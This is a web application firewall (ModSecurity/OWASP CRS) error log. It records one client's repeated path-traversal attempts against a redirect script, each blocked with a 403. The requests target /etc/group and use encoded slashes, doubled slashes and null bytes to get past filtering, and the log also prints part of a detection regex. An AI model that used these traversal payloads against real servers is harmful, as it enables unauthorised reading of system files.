[Tue May 12 05:36:44.757494 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.757552 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.758156 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.758405 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.995788 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdQAAAFY"]
[Tue May 12 05:36:44.995853 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdQAAAFY"]
[Tue May 12 05:36:44.995907 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdQAAAFY"]
[Tue May 12 05:36:44.995968 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdQAAAFY"]
[Tue May 12 05:36:44.996597 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdQAAAFY"]
[Tue May 12 05:36:44.996831 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdQAAAFY"]
[Tue May 12 05:36:45.161516 2026] [:error] [pid 1825179:tid 1825221] [client 49.146.225.100:57963] File does not exist: /home/ofcrysta/public_html/xmlrpc.php
[Tue May 12 05:36:45.234133 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.234182 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.234362 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.234403 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.234432 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.234462 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.234519 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.235155 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.235386 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihdwAAAFY"]
[Tue May 12 05:36:45.472700 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheAAAAFY"]
[Tue May 12 05:36:45.472769 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheAAAAFY"]
[Tue May 12 05:36:45.472813 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheAAAAFY"]
[Tue May 12 05:36:45.472873 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheAAAAFY"]
[Tue May 12 05:36:45.473518 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheAAAAFY"]
[Tue May 12 05:36:45.473757 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheAAAAFY"]
[Tue May 12 05:36:45.710999 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.711053 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.711238 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.711281 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.711310 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.711340 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.711394 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
